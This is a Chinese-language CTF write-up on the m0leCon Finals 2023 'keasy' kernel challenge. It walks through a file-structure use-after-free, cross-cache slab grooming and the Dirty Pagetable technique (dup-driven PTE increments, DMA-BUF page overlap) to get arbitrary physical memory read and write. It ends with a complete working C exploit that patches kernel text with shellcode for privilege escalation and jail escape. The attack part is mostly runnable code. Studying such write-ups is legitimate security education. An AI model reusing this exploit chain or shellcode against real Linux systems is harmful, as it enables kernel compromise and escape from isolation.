m0leConFinals 2023 Keasy CrossCache UAF + DirtyPagetable

传说中的dirty_pagetable.

漏洞在于copy_to_user失败后, 会fput释放file, 但用户态仍能通过fd访问到该file, 造成file结构体的UAF.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
static long keasy_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
long ret = -EINVAL;
struct file *myfile;
int fd;

if (!enabled) {
goto out;
}
enabled = 0;

myfile = anon_inode_getfile("[easy]", &keasy_file_fops, NULL, 0);

fd = get_unused_fd_flags(O_CLOEXEC);
if (fd < 0) {
ret = fd;
goto err;
}

fd_install(fd, myfile);

if (copy_to_user((unsigned int __user *)arg, &fd, sizeof(fd))) {
ret = -EINVAL;
goto err;
}

ret = 0;
return ret;

err:
fput(myfile);
out:
return ret;
}

CrossCache UAF的探索

由于file结构体是从独立缓存filp中分配的, 则不可避免的要用到CrossCache的手法.

查看与CrossCache UAF构造相关的系统变量的值.

但是在实践中发现了一个问题:

  1. cpu_partial为52, 但在还远未有52个partial_slab时即触发了__unfreeze_partials.

调试发现, s->cpu_partial_slabs的值为7(偏移在0x30处), 而不是52(这很奇怪, 从kmem_cache结构体来看, cpu_partial_slabs应该位于偏移0x28处, 且该处值确实为52).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
static void put_cpu_partial(struct kmem_cache *s, struct slab *slab, int drain)
{
struct slab *oldslab;
struct slab *slab_to_unfreeze = NULL;
unsigned long flags;
int slabs = 0;

local_lock_irqsave(&s->cpu_slab->lock, flags);

oldslab = this_cpu_read(s->cpu_slab->partial);

if (oldslab) {
if (drain && oldslab->slabs >= s->cpu_partial_slabs) {
/*
* Partial array is full. Move the existing set to the
* per node partial list. Postpone the actual unfreezing
* outside of the critical section.
*/
slab_to_unfreeze = oldslab;
oldslab = NULL;
} else {
slabs = oldslab->slabs;
}
}

slabs++;

slab->slabs = slabs;
slab->next = oldslab;

this_cpu_write(s->cpu_slab->partial, slab);

local_unlock_irqrestore(&s->cpu_slab->lock, flags);

if (slab_to_unfreeze) {
__unfreeze_partials(s, slab_to_unfreeze);
stat(s, CPU_PARTIAL_DRAIN);
}
}

构造方式一:

有如下两种可能的情形:

  1. 常规的CrossCache UAF构造, 原理见这篇文章 ,但是原文的方式没有考虑kmeme_cache_node的min_partial限制.
  2. ioctl触发的fput释放是通过RCU机制进行的, 所以等target释放时, 可能后面的一些喷射工作已经进行, 此时target所在板已经不再活跃, 所以会直接过早进入cpu->partial, 最终成为kmem_cache_node的min_partial个partial_slab之一.直到释放完postvictim_objs, target所在板完全空闲后才会从kmem_cache_node直接销毁.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 7
#define N_OVERFLOW ((CPU_PARTIAL+1)*OBJS_PER_SLAB)
#define N_PREVICTIM OBJS_PER_SLAB-1

#define CC_FACTOR CPU_PARTIAL
#define N_POSTVICTIM OBJS_PER_SLAB*CC_FACTOR


int overflow_objs[N_OVERFLOW];
int previctim_objs[N_PREVICTIM];
int postvictim_objs[N_POSTVICTIM];

for(int i = 0;i < N_OVERFLOW;++i)
{
overflow_objs[i] = open("/",O_RDONLY);
}

for(int i = 0;i < N_PREVICTIM;++i)
{
previctim_objs[i] = open("/",O_RDONLY);
}

ioctl(dev_fd,0xDEADBEAF);
/*1 fd , 0 ref*/


for(int i = 0;i < N_POSTVICTIM;++i)
{
postvictim_objs[i] = open("/",O_RDONLY);
}
/*2 fd , 1 ref*/

puts("[+] Releasing files...");
// Release the page for file slab cache
logd("1");
for(int i = 0;i < N_OVERFLOW;++i)
close(overflow_objs[i]);
logd("2");
for(int i = 0;i < N_PREVICTIM;++i)
close(previctim_objs[i]);
logd("3");
for(int i = 0;i < N_POSTVICTIM;++i)
close(postvictim_objs[i]);

构造方式二:
思路: 布置好NODE_MIN_PARTIAL个slab准备填充kmem_cache_node->partial, 再布置target_slab, 再布置overflow_objs. 然后依次释放, 待kmem_cache_cpu->partial填满, 则CPU_PARTIAL个slab将进入kmem_cache_node,其中NODE_MIN_PARTIAL个slab留在kmem_cache_node中, target_slab被销毁.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
    
#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 7
#define NODE_MIN_PARTIAL 5
#define N_NODEPARTIAL (NODE_MIN_PARTIAL*OBJS_PER_SLAB)
#define N_OVERFLOW ((CPU_PARTIAL-NODE_MIN_PARTIAL-2)*OBJS_PER_SLAB)
#define N_PREVICTIM OBJS_PER_SLAB-1

#define CC_FACTOR 3
#define N_POSTVICTIM OBJS_PER_SLAB*CC_FACTOR


int nodeminpartial_objs[N_NODEPARTIAL];
int previctim_objs[N_PREVICTIM];
int postvictim_objs[N_POSTVICTIM];
int overflow_objs[N_OVERFLOW];

logd("Prepare objs for filling kmem_cache_node->partial");
for(int i = 0;i < N_NODEPARTIAL;++i)
{
nodeminpartial_objs[i] = open("/",O_RDONLY);
}

logd("Prepare target slab");
logd("previctim");
for(int i = 0;i < N_PREVICTIM;++i)
{
previctim_objs[i] = open("/",O_RDONLY);
}

ioctl(dev_fd,0xDEADBEAF);
/*1 fd , 0 ref*/

logd("postvictim");
for(int i = 0;i < N_POSTVICTIM;++i)
{
postvictim_objs[i] = open("/",O_RDONLY);
}
/*2 fd , 1 ref*/

for(int i = 0;i < N_OVERFLOW;++i)
{
overflow_objs[i] = open("/",O_RDONLY);
}

logd("Trigger __unfreeze_partials then discard");

logd("1");
for(int i = 0;i < N_NODEPARTIAL;++i)
close(nodeminpartial_objs[i]);
logd("2");
for(int i = 0;i < N_PREVICTIM;++i)
close(previctim_objs[i]);
logd("3");
for(int i = 0;i < N_POSTVICTIM;++i)
close(postvictim_objs[i]);
logd("4");
for(int i = 0;i < N_OVERFLOW;++i)
close(overflow_objs[i]);

但是失败了, 查看发现target_slab变成了kmem_cache_node->partial链表的第一个. 分析原因是put_cpu_partial时是从链表头添加, (unfreeze_partial是从链表尾添加到node->partial). 所以应该调换布置的顺序.

该构造方法可以比较稳定的销毁target_slab, 且尽量避免销毁多余的slab(似乎也没这个必要,所以有了第三种方法).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 7
#define NODE_MIN_PARTIAL 5
#define N_NODEPARTIAL (NODE_MIN_PARTIAL*OBJS_PER_SLAB)
#define N_PREVICTIM OBJS_PER_SLAB-1
#define N_POSTVICTIM OBJS_PER_SLAB+1

#define CC_FACTOR 3
#define N_OVERFLOW ((CPU_PARTIAL-NODE_MIN_PARTIAL-2+CC_FACTOR)*OBJS_PER_SLAB)


int nodeminpartial_objs[N_NODEPARTIAL];
int previctim_objs[N_PREVICTIM];
int postvictim_objs[N_POSTVICTIM];
int overflow_objs[N_OVERFLOW];

logd("Prepare target slab");
logd("previctim");
for(int i = 0;i < N_PREVICTIM;++i)
{
previctim_objs[i] = open("/",O_RDONLY);
}

ioctl(dev_fd,0xDEADBEAF);
/*1 fd , 0 ref*/

logd("postvictim");
for(int i = 0;i < N_POSTVICTIM;++i)
{
postvictim_objs[i] = open("/",O_RDONLY);
}
/*2 fd , 1 ref*/

logd("Prepare objs for filling kmem_cache_node->partial");
for(int i = 0;i < N_NODEPARTIAL;++i)
{
nodeminpartial_objs[i] = open("/",O_RDONLY);
}

for(int i = 0;i < N_OVERFLOW;++i)
{
overflow_objs[i] = open("/",O_RDONLY);
}

logd("Trigger __unfreeze_partials then discard");

logd("1");
for(int i = 0;i < N_PREVICTIM;++i)
close(previctim_objs[i]);
logd("2");
for(int i = 0;i < N_POSTVICTIM;++i)
close(postvictim_objs[i]);

logd("3");
for(int i = 0;i < N_NODEPARTIAL;++i)
close(nodeminpartial_objs[i]);

logd("4");
for(int i = 0;i < N_OVERFLOW;++i)
close(overflow_objs[i]);

/*1 fd , 0 ref*/
sleep(20);

构造方法三:
确实,就是这么暴力, but work, 本质上和构造方法一相同.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
//#define N_FILESPRAY 2*OBJS_PER_SLAB*(CPU_PARTIAL+1)
#define N_FILESPRAY 0x100

puts("[+] Spraying files...");
// Spray file (1)
for (int i = 0; i < N_FILESPRAY/2; i++)
if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

// Get dangling file descriptorz
int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
fatal("ioctl did not fail");

// Spray file (2)
for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

puts("[+] Releasing files...");
// Release the page for file slab cache
for (int i = 0; i < N_FILESPRAY; i++)
close(file_spray[i]);

调堆时可能会用到的断点.

1
2
3
4
5
6
7
8
9
10
11
b keasy_open

# b alloc_empty_file
# b *(&__alloc_file+0x18)
b *(&keasy_ioctl+0x5c)
# b __fput
# b *(&file_free_rcu+57)
# b *(&__unfreeze_partials+208)
# b discard_slab
b __free_slab
# b *(&put_cpu_partial+74)

从File UAF出发的Dirty_Pagetable

再mmap分配一些匿名页并写入触发实际分配后, 可以看到file结构体已经被PTE覆盖.

但UAF的file结构体拥有的原语非常受限, 我们仍无法随意的修改PTE来完成物理地址任意写.

一个增量原语是通过dup增加file->f_count(偏移0x38处), 即可使PTE对应的物理地址发生偏移, 然而dup是有限制的(fork可以增大dup的次数,但仍有限制), 无法直接将其增加到内核text段(内核text段在低地址且距离极远).

于是走另一条路,dup 0x1000次使得两个PTE对应的物理地址重叠, 进一步munmap即可完成对page的UAF.


但我们没办法让新的用户页表占据UAF的page, 因为用户页表的物理页是从MIGRATE_UNMOVABLE内存区中分配, 而我们UAF的mmap来的匿名物理页来自MIGRATE_MOVABLE.

于是接下来有两种思路:

  1. 从MIGRATE_MOVABLE区域找可利用的对象.
  2. 使用其他方式映射页面, 使得UAF的页面来自MIGRATE_UNMOVABLE.

原文采用的是思路2. DMA-BUF使用的物理页来自MIGRATE_UNMOVABLE. 且与pte的页面来自同一个order.
如果布置使得DMA-BUF的页面与某些PTE相邻, 利用UAF增加DMA-BUF对应PTE使得DMA-BUF的页面与相邻的PTE重叠, 即可通过修改DMA-BUF页面的方式修改用户页表.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
logd("Spray PTE");
for(int i = 0; i < N_PAGESPRAY/2;++i)
{
logd("%p",page_sprays[i]);
for(int j = 0; j < 8; ++j)
*(page_sprays[i]+j*0x1000) = 'A'+j;
}

// Allocate DMA-BUF heap
int dma_buf_fd = -1;
struct dma_heap_allocation_data data;
data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;
if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
err_exit("DMA_HEAP_IOCTL_ALLOC");
printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);


for(int i = N_PAGESPRAY/2; i < N_PAGESPRAY;++i)
{
logd("%p",page_sprays[i]);
for(int j = 0; j < 8; ++j)
*(page_sprays[i]+j*0x1000) = 'A'+j;
}


logd("Increment file->f_count to construct page overlapping");
int ezfd = previctim_objs[N_PREVICTIM-1]+1;
logd("ezfd is %d",ezfd);
// Increment physical address
for (int i = 0; i < 0x1000; i++)
if (dup(ezfd) < 0)
err_exit("dup");


logd("Find overlapping page");
char* overlapping_page;
for(int i = 0; i < N_PAGESPRAY;++i)
{
for(int j = 0; j < 8; ++j)
if(*(page_sprays[i]+j*0x1000) != 'A'+j)
{
overlapping_page = page_sprays[i]+j*0x1000;
logi("Overlapping page: %p",overlapping_page);
break;
}
}

logd("Replace overlapping_page's PTE with dmabuf's PTE");
munmap(overlapping_page,0x1000);
char* dmabuf = mmap(overlapping_page,0x1000,7,MAP_SHARED|MAP_POPULATE,dma_buf_fd,0);
strcpy(dmabuf,"Snowfall");


size_t buf[0x1000];
memcpy(buf,dmabuf,0x1000);
hexdump(buf,0x30);

logi("Increment dmabuf's PTE to overlap with some other PTE");
// Increment physical address
for (int i = 0; i < 0x2000; i++)
if (dup(ezfd) < 0)
err_exit("dup");

memcpy(buf,dmabuf,0x1000);
hexdump(buf,0x30);

可以看到增加后dma-buf已经与一些PTE重叠, 此时更改这些PTE, 我们便拥有了任意物理内存读写的能力.

此时HanQi脱口而出那句名言.
“世界上最遥远的距离,是任意地址写和ASLR”.

但在当前情形下形同虚设. 原因如下:

  1. 我们不仅能够任意地址写, 同时还能任意地址读. 且是物理地址, 不会由于中途遇到非法地址而导致崩溃. 这给了我们搜索的能力.
  2. 内核中在固定物理地址处有残留的内核物理地址,如0x9c000处.(经典)

然后改写内核text段提权+逃逸就行了.
这部分直接照搬了.

EXP

最终exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
#include <kernelpwn.h>

struct dma_heap_allocation_data {
uint64_t len;
uint32_t fd;
uint32_t fd_flags;
uint64_t heap_flags;
};
#define DMA_HEAP_IOCTL_ALLOC 0xc0184800


static void win() {
char buf[0x100];
int fd = open("/dev/sda", O_RDONLY);
if (fd < 0) {
puts("[-] Lose...");
} else {
puts("[+] Win!");
read(fd, buf, 0x100);
write(1, buf, 0x100);
puts("[+] Done");
}
exit(0);
}


int main()
{
int ret = 0;
setvbuf(stdout,_IONBF,0,0);
setvbuf(stderr,_IONBF,0,0);
save_status();
bind_core(0);

if((dev_fd = open("/dev/keasy",O_RDWR))<0)
{
err_exit("open device");
}

// Open DMA-BUF
int dmafd = creat("/dev/dma_heap/system", O_RDWR);
if (dmafd == -1)
err_exit("/dev/dma_heap/system");

#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 7
#define NODE_MIN_PARTIAL 5
#define N_NODEPARTIAL (NODE_MIN_PARTIAL*OBJS_PER_SLAB)
#define N_PREVICTIM OBJS_PER_SLAB-1
#define N_POSTVICTIM OBJS_PER_SLAB+1

#define CC_FACTOR 3
#define N_OVERFLOW ((CPU_PARTIAL-NODE_MIN_PARTIAL-2+CC_FACTOR)*OBJS_PER_SLAB)

#define N_PAGESPRAY 0x200
char* page_sprays[N_PAGESPRAY];
for(int i = 0; i < N_PAGESPRAY;++i)
page_sprays[i] = mmap(0xDEAD0000+i*0x10000,0x8000,7,MAP_ANONYMOUS|MAP_PRIVATE,-1,0);


int nodeminpartial_objs[N_NODEPARTIAL];
int previctim_objs[N_PREVICTIM];
int postvictim_objs[N_POSTVICTIM];
int overflow_objs[N_OVERFLOW];

logd("Prepare target slab");
logd("previctim");
for(int i = 0;i < N_PREVICTIM;++i)
{
previctim_objs[i] = open("/",O_RDONLY);
}

ioctl(dev_fd,0xCAFEBABE);
/*1 fd , 0 ref*/

logd("postvictim");
for(int i = 0;i < N_POSTVICTIM;++i)
{
postvictim_objs[i] = open("/",O_RDONLY);
}
/*2 fd , 1 ref*/

logd("Prepare objs for filling kmem_cache_node->partial");
for(int i = 0;i < N_NODEPARTIAL;++i)
{
nodeminpartial_objs[i] = open("/",O_RDONLY);
}

for(int i = 0;i < N_OVERFLOW;++i)
{
overflow_objs[i] = open("/",O_RDONLY);
}

logd("Trigger __unfreeze_partials then discard");

for(int i = 0;i < N_PREVICTIM;++i)
close(previctim_objs[i]);

for(int i = 0;i < N_POSTVICTIM;++i)
close(postvictim_objs[i]);

for(int i = 0;i < N_NODEPARTIAL;++i)
close(nodeminpartial_objs[i]);

for(int i = 0;i < N_OVERFLOW;++i)
close(overflow_objs[i]);

/*1 fd , 0 ref*/

logd("Spray PTE");
for(int i = 0; i < N_PAGESPRAY/2;++i)
{
// logd("%p",page_sprays[i]);
for(int j = 0; j < 8; ++j)
*(page_sprays[i]+j*0x1000) = 'A'+j;
}

// Allocate DMA-BUF heap
int dma_buf_fd = -1;
struct dma_heap_allocation_data data;
data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;
if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
err_exit("DMA_HEAP_IOCTL_ALLOC");
logi("dma_buf_fd: %d", dma_buf_fd = data.fd);


for(int i = N_PAGESPRAY/2; i < N_PAGESPRAY;++i)
{
// logd("%p",page_sprays[i]);
for(int j = 0; j < 8; ++j)
*(page_sprays[i]+j*0x1000) = 'A'+j;
}


logd("Increment file->f_count to construct page overlapping");
int ezfd = previctim_objs[N_PREVICTIM-1]+1;
logd("ezfd is %d",ezfd);
// Increment physical address
for (int i = 0; i < 0x1000; i++)
if (dup(ezfd) < 0)
err_exit("dup");


logd("Find overlapping page");
char* overlapping_page;
for(int i = 0; i < N_PAGESPRAY;++i)
{
for(int j = 0; j < 8; ++j)
if(*(page_sprays[i]+j*0x1000) != 'A'+j)
{
overlapping_page = page_sprays[i]+j*0x1000;
logi("Overlapping page: %p",overlapping_page);
break;
}
}

logd("Replace overlapping_page's PTE with dmabuf's PTE");
munmap(overlapping_page,0x1000);
char* dmabuf = mmap(overlapping_page,0x1000,7,MAP_SHARED|MAP_POPULATE,dma_buf_fd,0);
strcpy(dmabuf,"Snowfall");


size_t buf[0x1000];
memcpy(buf,dmabuf,0x1000);
hexdump(buf,0x30);

logi("Increment dmabuf's PTE to overlap with some other PTE");
// Increment physical address
for (int i = 0; i < 0x2000; i++)
if (dup(ezfd) < 0)
err_exit("dup");

memcpy(buf,dmabuf,0x1000);
hexdump(buf,0x30);

// logd("Read Fixed Phy")
*(size_t*)dmabuf = 0x800000000009c067;

char* arb_ptr;
for (int i = 0; i < N_PAGESPRAY; i++) {
if (page_sprays[i] == overlapping_page) continue;
if (*(size_t*)page_sprays[i] > 0xffff) {
arb_ptr = page_sprays[i];
printf("[+] Found victim page: %p\n", arb_ptr);
break;
}
}

size_t phys_base = ((*(size_t*)arb_ptr) & ~0xfff) - 0x1c04000;
logi("Got phy_base: %p",phys_base);


logi("Overwriting do_symlinkat...");
size_t phys_func = phys_base + 0x24d4c0;
*(size_t*)dmabuf = (phys_func & ~0xfff) | 0x8000000000000067;
char shellcode[] = {0xf3, 0x0f, 0x1e, 0xfa, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x49, 0x81, 0xef, 0xc9, 0xd4, 0x24, 0x00, 0x49, 0x8d, 0xbf, 0xd8, 0x5e, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x20, 0xe6, 0x0a, 0x00, 0xff, 0xd0, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc7, 0x49, 0x8d, 0xb7, 0xe0, 0x5c, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x40, 0xc1, 0x0a, 0x00, 0xff, 0xd0, 0x49, 0x8d, 0xbf, 0x48, 0x82, 0x53, 0x01, 0x49, 0x8d, 0x87, 0x90, 0xf8, 0x27, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc3, 0x48, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x98, 0x40, 0x07, 0x00, 0x00, 0x31, 0xc0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xb8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xb8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18, 0x48, 0xb8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0xb8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xb8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8d, 0x87, 0x41, 0x0f, 0xc0, 0x00, 0xff, 0xe0, 0xcc};

void *p;
p = memmem(shellcode, sizeof(shellcode), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
*(size_t*)p = getpid();
p = memmem(shellcode, sizeof(shellcode), "\x22\x22\x22\x22\x22\x22\x22\x22", 8);
*(size_t*)p = (size_t)&win;
p = memmem(shellcode, sizeof(shellcode), "\x33\x33\x33\x33\x33\x33\x33\x33", 8);
*(size_t*)p = user_cs;
p = memmem(shellcode, sizeof(shellcode), "\x44\x44\x44\x44\x44\x44\x44\x44", 8);
*(size_t*)p = user_rflags;
p = memmem(shellcode, sizeof(shellcode), "\x55\x55\x55\x55\x55\x55\x55\x55", 8);
*(size_t*)p = user_sp;
p = memmem(shellcode, sizeof(shellcode), "\x66\x66\x66\x66\x66\x66\x66\x66", 8);
*(size_t*)p = user_ss;

memcpy(arb_ptr + (phys_func & 0xfff), shellcode, sizeof(shellcode));
puts("[+] GO!GO!");

printf("%d\n", symlink("/jail/x", "/jail"));

puts("[-] Failed...");
close(dev_fd);

sleep(20);
return 0;
}

过程图示

之前的描述可能有一些歧义, 这里画图再解释一下流程.

首先喷射并释放file, 使该页面其回到BuddySystem.

触发mmap缺页, 分配用户页表和匿名页面. 用户页表占据刚刚的file页面.
dup增加与f_count字段重合的PTE0x1000次, 使得其指向下一个页面, 造成两个PTE重合.
取消其中一个的映射, 即可造成PageUAF.

接下来PageUAF的利用就有很多了.
原文是想再次使用户页表占据改UAF的匿名页面完成任意物理地址读写, 但用户页表来自UNMOVABLE, 匿名页面来自MOVABLE, 所以这是无法实现的.

但DMA分配的匿名页面是来自UNMOVABLE的, 所以这里解除我们可控PTE的映射, 再在同一个虚拟地址映射DMA_BUF, 就可以形成下方左图的情形(要提前分配DMA_BUF, 注意分配和映射的区别). 然后再次dup增加DMA_PTE, 即可使得DMA_PTE指向DMA_BUF下方的页表, 完成任意物理地址读写.

实际上, 该利用方法并没有使用PageUAF.

参考文章

https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606
https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2024 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信